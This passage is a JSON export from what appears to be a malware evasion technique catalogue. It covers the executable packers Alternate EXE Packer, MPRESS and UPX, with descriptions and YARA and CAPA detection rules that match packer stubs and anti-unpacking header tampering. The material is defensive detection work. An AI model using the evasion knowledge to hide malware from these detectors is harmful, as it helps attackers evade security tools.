            "unprotect_id": "U1404",
            "name": "Alternate EXE Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "EXE Packer is able to compress executable files (type EXE) or DLL-files. Already compressed files may also be decompressed with this program. There exist 12 different levels for file-compression. This program is also able to create backups of the files that shall be compressed.\r\n\r\nIf a file is compressed the physical file-size is reduced on the respective device. A compressed file decompresses itself while being executed and can be used without this program. This program is freeware. It requires the .NET-framework 2.0 (already included in operation system since Windows Vista).",
            "resources": "https://www.alternate-tools.com/pages/c_exepacker.php?lang=ENG",
            "tags": "packer",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 184,
            "unprotect_id": "U1403",
            "name": "MPRESS",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "MPRESS is a free packer. It makes programs and libraries smaller, and decrease start time when the application loaded from a slow removable media or from the network.\r\n\r\nIt uses in-place decompression technique, which allows to decompress the executable without memory overhead or other drawbacks; it also protects programs against reverse engineering by non-professional hackers. Programs compressed with MPRESS run exactly as before, with no runtime performance penalties.",
            "resources": "https://www.autohotkey.com/mpress/mpress_web.htm",
            "tags": "MPRESS",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 103,
                    "key": "yara_detect_mpress",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_MPRESS",
                    "rule": "rule MPRESS_V097_V099_MATCODE_Softwarenbsp_nbsp_SignByfly_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V200_V20X_MATCODE_Software_20090423: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Softwarenbsp_nbsp_SignByfly_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V097_V099_MATCODE_Software_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Software_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Software_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Software_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V12X_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 183,
            "unprotect_id": "U1402",
            "name": "UPX: Ultimate Packer for Executables",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "UPX is a free, portable, extendable, high-performance executable packer for several executable formats.",
            "resources": "https://en.wikipedia.org/wiki/UPX\r\nhttps://upx.github.io/",
            "tags": "upx",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 50,
                    "key": "yara_packer_antiunpack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_PACKER_antiunpack",
                    "rule": "rule upx_antiunpack_pe {\r\n     meta:\r\n        description = \"Anti-UPX Unpacking technique about section renaming and zero padding against upx reference structure\"\r\n        author = \"hackeT\"\r\n\r\n    strings:\r\n        $mz = \"MZ\"\r\n\r\n        $upx0 = {55 50 58 30 00 00 00}  //section name UPX0\r\n        $upx1 = {55 50 58 31 00 00 00}  //section name UPX1\r\n        $upx_sig = \"UPX!\"               //UPX_MAGIC_LE32\r\n        $upx_sig2 = {A1 D8 D0 D5}       //UPX_MAGIC2_LE32\r\n        $zero = {00 00 00 00}\r\n\r\n    condition:\r\n        $mz at 0 and ( $upx_sig at 992 or $upx_sig2 at 992 )\r\n        and \r\n        ( \r\n          not ($upx0 in (248..984) or $upx1 in (248..984)) // section renaming: 248 is the minimum offset after pe optional header.\r\n        or \r\n          $zero in (992..1024)                             // zero padding against upx reference structure: pe header ends offset 1024.\r\n        )\r\n}"
                },
                {
                    "id": 94,
                    "key": "capa_detect_upx",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_UPX",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with UPX\r\n    namespace: anti-analysis/packer/upx\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::UPX [F0001.008]\r\n    examples:\r\n      - CD2CBA9E6313E8DF2C1273593E649682\r\n      - Practical Malware Analysis Lab 01-02.exe_:0x0401000\r\n  features:\r\n    - or:\r\n      - and:\r\n        - format: pe\r\n        - or:\r\n          - section: UPX0\r\n          - section: UPX1\r\n      - and:\r\n        - format: elf\r\n        - or:\r\n          - string: \"UPX!\""
                },
                {
                    "id": 102,
                    "key": "yara_detect_upx",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_UPX",
                    "rule": "rule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8D ?? ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC 2E ?? ?? ?? ?? 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 03 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_302: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n        $b = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 99 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 FC 01 00 00 83 CD FF 31 DB EB 0C 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_123_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 33 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B3 01 00 00 EB 0A 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 